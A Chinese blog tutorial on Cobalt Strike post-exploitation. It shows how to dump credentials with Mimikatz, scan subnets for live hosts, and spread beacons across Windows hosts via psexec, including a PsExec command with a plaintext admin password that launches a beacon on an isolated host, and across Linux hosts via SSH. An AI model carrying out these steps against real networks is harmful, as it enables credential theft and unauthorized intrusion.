不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

如何利用CobalStrike进行批量上线?

言:

当获取一台目标服务器权限时,更多是想办法扩大战果,获取目标凭据并横向进行登陆是最快速的拿权方式。但目标所处环境是否可出网,如何利用CobalStrike进行批量上线?

一、获取凭证:

目标机器CobalSt rike上线后,通常先抓取该主机凭据,选择执行Access->Run Mimikatz,或在 Beacon中执行logonpasswords命令。需要当前会话为管理员权限,才能成功,如果权限低,先提权~

下面的是执行logonpasswords

图形中是这个。

然后查看凭证,Gredentials

但是不是每次都能抓取到明文

二、目标机出网:

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalSt rike 本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec :在主机上使 用服务派生会话)

使用portscan命令:ip网段—ports端口 一扫描协议(arp、icmp、none) 一线程(实战不要过高)。

这里我环境开了一台03的虚拟机,地址是192.168.19.134看能搜集到探测她的445端口

beacon> portscan 192.168.19.0/24 445 arp 200

点击工具栏的V iew->Ta rgets,查看端口探测后的存活主机。

然后右键,用之前收集到的凭证去试其他存活主机。如果在一个域中,所有主机的用户名和密码应该都 是一致的。

右键机器:

然后选择之前的获取的账号和密码,明文密文都可以,session选择之前的控机。

然后在beacon中就可以看到执行的命令。并且这台03的机器就会成功的上线

三、目标机不出网

实战中经常会遇到这种情况,获取到目标内网中某台主机的系统权限,但是该主机处在隔离网络中,不能出网。又因为CobalStrike服务端是搭建在互联网中的,通过常规方式是无法上线的,这里就需要利用已上线的主机,将它做一个Listener,实现链路上线CobalStrike。

注:此实验只能在4.0版本以下进行

环境模拟:

主机08服务器:192.168.203.128/24 #不出网

边界服务器:win7双网卡:192.168.19.132、192.168.203.129

vps:X.X.X.X

win7和08服务器能互相访问,但是vps访问不了08已有权限win7,试验目的,想要08系统在CS端上线,这里借鉴一下网上的方法,利用PxExec来把生成的后门传到不出网机器上,

首先把他们两个放到一个目录下

那么如何放进去呢?CS自带一个文件浏览器,只不过速度有些慢,可以的话尽量用webshell工具,直接上刀上剑放蝎子。。

这里是放到已控机器的同一目录。

然后执行命令:

beacon> shellC:\Windows\Temp\PsExec64.exe-accepteula \\192.168.203.129,192.168.203.128 -uadministrator-pasdqwe123. -d-cC:\Windows\Temp\beacon65.exe

等待上线即可、、

个人觉得这个方法太过麻烦,如果这里用l cx,ew等代理攻击进行的话,会更加的省时省力~

四、Linux主机-SSH批量上线

第一步还是探测存活主机,然后利用已控的机器进行操作上线。

环境:

CentOS: 192.168.19.139

win7:192.168.19.132

vps :x.x.x.x

通过扫描发现机器:

beacon> portscan 192.168.19.100-150 22 arp 200

然后观看存活主机

然后

建议用ssh-key

密码建议用其他方式去获取,这里爆破的话效率不高输入对的账号密码后

然后正常等待上线即可

成功上线

转自:MS08067

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » 如何利用CobalStrike进行批量上线?

相关推荐

  • 暂无文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏